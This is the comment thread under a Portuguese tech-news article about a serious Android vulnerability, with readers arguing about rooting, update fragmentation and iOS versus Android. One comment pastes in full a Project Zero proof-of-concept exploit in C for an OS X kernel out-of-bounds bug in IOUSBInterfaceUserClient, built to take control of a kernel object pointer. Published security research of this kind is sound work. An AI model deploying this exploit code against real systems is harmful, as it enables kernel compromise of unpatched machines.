PplWare Mobile

Cuidado, há uma nova falha grave no Android!

                                    
                                

Este artigo tem mais de um ano


Autor: Pedro Simões


  1. Miguel says:

    Bootloader locked e não tenho que me preocupar com essas coisas.

    O pessoal faz root e unlock bootloader depois metem-se a jeito!

  2. jesus says:

    Qual o nome da aplicação retirada da loja pela Google?

  3. António Marques says:

    Pq falam de coisas q ñ sabem ? Todos os Android q tive, tive sempre com ROOT e Bootloader Unlocked…problemas ?!?!? ZERO ! Existe um site / forum chamado XDA, site esse q tem pessoas q ajudam a “libertar” o sistema Android e para ajudar todos aqueles q tenham dúvidas ! Basta ler e estudar os tópicos referentes aos modelos q têm.
    Para mim o melhor site / forum sobre Android.

  4. Gustavo Santos says:

    Dava jeito saber qual é o nome da aplicação…

  5. António says:

    A falha é nova, ou foi descoberta agora?

  6. andre l says:

    lol o “android do chines”? por exemplo? “Mesmo assim, e graças à fragmentação do Android, muitos vão ser os equipamentos que não vão ter acesso a estas actualizações e que vão continuar expostos ao problema.”

  7. Jacinto Leite Capelo Rego says:

    O Android é mais falhas! Essa é que é a verdade…

  8. José Antonio Maria says:

    “Por norma isto é feito de forma consciente e controlada, sendo realizado pelos utilizadores.” Oi?
    Desde quando? Os utilizadores dizem amén a tudo. A app da flashlight acede aos contactos e dizem que sim. Algo feito de forma consciente e controlada? isso existe? onde raio foram buscar esta opinião?

    • NMF says:

      desde que é preciso saber o que se está a fazer para fazer root a um telemóvel

      • MaRIA says:

        Vou já tirar um curso para prender a fazer root ao telemóvel.
        😉

        • Gustavo Parreira says:

          Acredita que muita gente precisa… Não é assim tão fácil para quem é mais “iletrado” em tecnologia

        • K says:

          Na verdade até precisas e não é fácil. A única razão pela qual não o fizeste é porque há gente que o fez por ti, teve o trabalho e teve a gentileza de o publicar de forma extremamente simplificada para asnos como nós o conseguirmos reproduzir sem ter que perceber muito do assunto. Ou achas que as coisas caem do céu?

          Não fazes root ao teu telemóvel por acidente, e quando eles se referem a uma forma consciente e controlada é quando o fazes para obter um fim específico. Quando é explorado maliciosamente é quando deixou de ser consciente e controlado.
          Agora ao que tu provavelmente te queres referir é às consequências de o fazer. Se vais por aí, é responsabilidade tua saberes ao que estás sujeito e o que pode advir disso, positivo e negativo.

    • Alfa says:

      looooool mesmo

  9. #Fernando says:

    Só mais uma….todos os dias sai uma nova…qual a novidade…bah

  10. Rui says:

    mais uma…. android nunca mais, so me deu problemas.

  11. AnaguaMateus says:

    Não há SO sem problemas, há SO que não foram explorados o suficiente.

    Antigamente o Windows era um cancro, agora o Android, baseado em linux é uma besta..

    Só a Apple é que é boa… cof cof.. Se fosse o SO mais usado, era logo encontrado uns quantos..

    • Hugo says:

      Exactamente.
      E vamos lá fazer a analogia dos automoveis:
      Porque não andamos todos de mercedes? É bom…venha quem vier.
      Essa coisa do ser melhor só é usado pra não ficarem com penas dos € investidos em telefones.
      Pk quem realmente quer e pode ter um topo de gama compra e nem tem qu justificar nada 🙂

  12. Alfa says:

    WP, e mais nada.

  13. Jorge says:

    Boas noticias mas só deveremos receber a atualizacao daqui a 1 ano
    Ainda a espera do marshmellow para o galaxy s6 🙁

    • Mota says:

      Oh Jorge, o autor do artigo foi claro nesse aspeto:

      “Os parceiros OEM receberam também este patch de segurança para que os enviem para os seus equipamentos.”

      Resta-te aqui 2 coisas:

      Ou compras nexus e tens updates durante anos
      ou compras um equipamento que te permita alterar rom, para quando a tua “marca” deixe de lançar updates.

    • Edgar says:

      Recebi o marshmallow hoje no meu S6 Edge + 🙂

    • samuel says:

      Mas deve ter atualizações de segurança mensais.

  14. Francisco says:

    Apenas uma das “leis” de segurança informática: mais vale ter um sistema que quando se encontra uma falha, todos sabem e podem se proteger, que um sistema fechado que também tem falhas, mas só o cracker sabe.

  15. Diogo says:

    uma parte do android é open source, outra parte tem codigo da google. o facto de uma parte ser open source favorece que sejam descobertas mais falhas e vulnerabilidades tornando o sistema mais seguro. testes recentes mostram que o android é mais seguro que ios.

    • Tomás says:

      Esta falha no kernel Linux já foi descoberta há mais de 2 anos e só agora é que no Android decidiram corrigir. Não parece que tenha favorecido muito.
      Que testes recentes são esses?

    • Mota says:

      Poderá ser mais seguro, mas aqui lá está.. depende sempre do utilizador.

      Eu tendo mais liberdade num S.O. controlo melhor a minha segurança, lógico que nada é anti bala, mas é possivel ter-se segurança

  16. rui says:

    O problema disto é que vai ser mais uma vez que só as versões de android de 5 para cima é que vão receber as tais atualizações a corrigir isto. Quem tem para baixo fica na mesma.

  17. O confundido says:

    Falhas? Alguém que me traduza isso porque eu com o meu W10M nao percebo grande coisas de falhas

  18. jorge santos says:

    O meu Nexus 6P parece-me ter sido uma boa compra.

  19. David Ramos says:

    Só vejo um motivo para os utilizadores de IOS virem, todos chateados, comentar esta notícia que até foi notificada pela própria Google. O motivo é estarem entalados com um equipamento que não vale o preço. Não vejo outra razão. É que nem sequer são coerentes nem realistas nas críticas. E o pior é que não pesquisam antes de comentar seja o que for. Em relação a notícia tenho um equipamento da Apple e outro da Google (nexus) e até acho (parece-me a mim) que os equipamentos nexus recebem as correcções mais rapidamente do que o IOS (no meu caso um ipad)

  20. skylle says:

    Precisa PoC
    Informação inútil !!

  21. skylle says:

    olha uma vulnerabilidae em iOS

    /*
    Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=728

    External Method 36 of IOUSBInterfaceUserClient is _AbortStreamPipe.

    It takes two scalar inputs and uses the second one as an array index to read a pointer
    to a C++ object without checking the bounds then calls a virtual method on it.

    Furthermore there’s no check that the array pointer is non-null; if it is then we can get a
    controlled offset-from-zero read; since our controlled dword will be multiplied by 8 to
    index the array this means we can easily get the kernel to dereference a controllable
    userspace address.

    In this case a value of 0xf0f0f0f0 leads to the kernel reading an IOKit object pointer from
    0x787878780. This poc maps that page to demonstrate control of a kernel object pointer.

    tested on MacBookAir5,2 w/10.11.3 (15D21)
    */

    // ianbeer

    // build: clang -o usb_oob usb_oob.c -framework IOKit
    // tested on MacBookAir5,2 w/10.11.3 (15D21)

    /*
    OS X Kernel code execution due to lack of bounds checking in AppleUSBPipe::Abort

    External Method 36 of IOUSBInterfaceUserClient is _AbortStreamPipe.

    It takes two scalar inputs and uses the second one as an array index to read a pointer
    to a C++ object without checking the bounds then calls a virtual method on it.

    Furthermore there’s no check that the array pointer is non-null; if it is then we can get a
    controlled offset-from-zero read; since our controlled dword will be multiplied by 8 to
    index the array this means we can easily get the kernel to dereference a controllable
    userspace address.

    In this case a value of 0xf0f0f0f0 leads to the kernel reading an IOKit object pointer from
    0x787878780. This poc maps that page to demonstrate control of a kernel object pointer.
    */

    #include
    #include
    #include
    #include
    #include

    #include
    #include

    #include

    void map_payload(uint64_t target_rip) {
    uint64_t*** obj_ptr_ptr = (void*)0x0000000787878780;
    void* request = (void*)0x0000000787878000;
    void* page = mmap(request, 0x1000, PROT_READ|PROT_WRITE, MAP_FIXED|MAP_ANON|MAP_PRIVATE, -1, 0);
    if (request != page) {
    printf(“MAP_FIXED didn’t give us the right page\n”);
    exit(EXIT_FAILURE);
    }

    memset((void*)page, ‘A’, 0x1000);
    }

    uint64_t make_call(mach_port_t conn) {
    kern_return_t err;

    uint64_t inputScalar[16];
    uint64_t inputScalarCnt = 0;

    char inputStruct[4096];
    size_t inputStructCnt = 0;

    uint64_t outputScalar[16];
    uint32_t outputScalarCnt = 0;

    char outputStruct[4096];
    size_t outputStructCnt = 0;

    inputScalarCnt = 2;
    inputScalar[0] = 0;
    inputScalar[1] = 0xf0f0f0f0;

    err = IOConnectCallMethod(
    conn,
    36,
    inputScalar,
    inputScalarCnt,
    inputStruct,
    inputStructCnt,
    outputScalar,
    &outputScalarCnt,
    outputStruct,
    &outputStructCnt);

    if (err != KERN_SUCCESS){
    printf(“IOConnectCall error: %x\n”, err);
    } else{
    printf(“worked?\n”);
    }

    return 0;
    }

    mach_port_t get_user_client(char* name, int type) {
    kern_return_t err;

    CFMutableDictionaryRef matching = IOServiceMatching(name);
    if(!matching){
    printf(“unable to create service matching dictionary\n”);
    return 0;
    }

    io_iterator_t iterator;
    err = IOServiceGetMatchingServices(kIOMasterPortDefault, matching, &iterator);
    if (err != KERN_SUCCESS){
    printf(“no matches\n”);
    return 0;
    }

    io_service_t service = IOIteratorNext(iterator);

    if (service == IO_OBJECT_NULL){
    printf(“unable to find service\n”);
    return 0;
    }
    printf(“got service: %x\n”, service);

    io_connect_t conn = MACH_PORT_NULL;
    err = IOServiceOpen(service, mach_task_self(), type, &conn);
    if (err != KERN_SUCCESS){
    printf(“unable to get user client connection\n”);
    return 0;
    }

    printf(“got userclient connection: %x\n”, conn);

    return conn;
    }

    int main(int argc, char** argv){
    mach_port_t port = get_user_client(“IOUSBInterface”, 0x0);
    map_payload(0xffff414141414141);
    make_call(port);
    return 0;

    }

  22. zeze says:

    Bastava a google bloquear a instalação de apks externos via file explorers e afins.

    Os utilizadores ficavam mais limitados como os do iOS e os devs eram os únicos com conhecimentos suficientes pra proceder à instalação das suas apps pra testes e debugging.

  23. skylle says:

    “Se um hacker tiver acesso fisico ao teu dispositivo,
    ele deixa de ser teu!”
    –Mitnick
    Agora so precisas saber quem é o hacker, eu sei que eu o sou nos meus dispositivos.

Deixe um comentário

O seu endereço de email não será publicado.

You may use these HTML tags and attributes: <a href="" title="" rel=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>

*

Aviso: Todo e qualquer texto publicado na internet através deste sistema não reflete, necessariamente, a opinião deste site ou do(s) seu(s) autor(es). Os comentários publicados através deste sistema são de exclusiva e integral responsabilidade e autoria dos leitores que dele fizerem uso. A administração deste site reserva-se, desde já, no direito de excluir comentários e textos que julgar ofensivos, difamatórios, caluniosos, preconceituosos ou de alguma forma prejudiciais a terceiros. Textos de caráter promocional ou inseridos no sistema sem a devida identificação do seu autor (nome completo e endereço válido de email) também poderão ser excluídos.